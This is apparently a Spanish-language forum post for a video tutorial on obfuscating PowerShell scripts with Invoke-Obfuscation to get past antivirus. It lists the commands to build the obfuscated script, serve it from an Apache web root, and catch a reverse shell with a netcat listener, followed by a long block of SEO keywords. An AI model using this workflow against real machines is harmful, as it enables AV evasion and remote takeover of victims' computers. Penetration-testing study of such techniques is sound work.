
LINKS o ENLACES IMPORTANTES
https://github.com/danielbohannon/Invoke-Obfuscation
https://github.com/swisskyrepo/Payloads ... powershell
https://hackersploit.org/windows-red-te ... echniques/
COMANDOS UTILIZADOS
Código: Seleccionar todo
Clonar el repositorio
git clone https://github.com/danielbohannon/Invoke-Obfuscation
Instalar powershell en kali linux
sudo apt-get install powershell -y
para acceder tenemos que poner
pwsh
Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation
nano script.ps1
SET SCRIPTPATH /home/rogerio24/script.ps1
Seleccionamos el tipo de metodo de ofuscacion o de encyptacion o ocultacion
AST
Aca seleccionamos todos
ALL
Confirmamos y listo
1
nano ejecutar.ps1
mv ejecutar.ps1 /var/www/html/ejecutar.ps1
service apache2 status
service apache2 start
-----------------------------------------------------------
Listener en Kali Linux
nc -nvlp 1234

VIDEO TUTORIAL
Como Acceder con Shellter y Invoke-Obfuscation PowerShell v2.0+ compatible PowerShell linux for ethical hackers como usar kali linux, explotar vulnerabilidades con metasploit acceder a windows con metasploit acceder a windows acceder graficamente a windows desde kali linux acceder remotamente a windows information systems security professional metasploit ataque a windows proteger computadoras penetration tests oscp certification Security Technologies Sistema operativo Operating Systems Instalación y configuración Install and configure ssh Unauthenticated LAN Remote Code Execution Wordlist Reverse connection Shell backdoor LAN | Local Area Network CMD execution How to Exploit and Test this Critical Vulnerability ransomware attackers repository Netcat Listener Exploit Code NC Virtual machine maquina virtua NetCat GitHub Firewall Pentest Lab Setup Laboratorio de Trabajo Security Ethical Hacking Certification Guide how to get in Terminal Hashcat python blue team Dynamic Shellcode Injection Windows Red Team red team Windows Bug mfsconsole vulnerabilidades de seguridad detección de intrusos Networking Hash scripts cifrado descrifrar Defense Evasion With Shellter Obfuscation Encoding Mitre Packing Crypters AV Evasion Methods Penetration Testing Malware Analysis shellcode PE FILES Ethical Hacker, Penetration Tester Cybersecurity Consultant learn security unix try hack me hacking ctf for beginners Linux Ubuntu ehtical hacking cyber seguridad linux for ethical hackers capacitacion educacion How Hackers Do It cyber security remote function Injecting Shellcode into Portable Executables cyber seguridad security tool linux for ethical hackers capacitacion educacion How Hackers Do It cyber security tutorial comandos commands remote function laboratorio testing servidor como escalar privilegios en windows o linux kernel vulnerable CVE Setting Up Invoke-Obfuscation On Kali remote function hacker exploit hacking kali linux red teaming what is a red team red team exploitation red team initial access powershell empire tutorial powershell empire macro red team defense evasion av evasion av evasion 2023 powershell obfuscation red team windows Ethical Hacker Penetration Tester Cybersecurity Consultant learn security unix try hack me ctf for beginners ehtical hacking programa informatico,computerscienceinformationsecurity,cyber seguridad,reverse shell tutorialcopy files powershell,cybersecurity consultant,learn security,oscp certification,information systems security professional,laboratorio,linux for ethical hackers,cyber security,how hackers do it,como usar kali linux,servidor,tutorial,security,powershell file transfer,como escalar privilegios en windows o linux,capacitacion,ethical hacker,ehtical hacking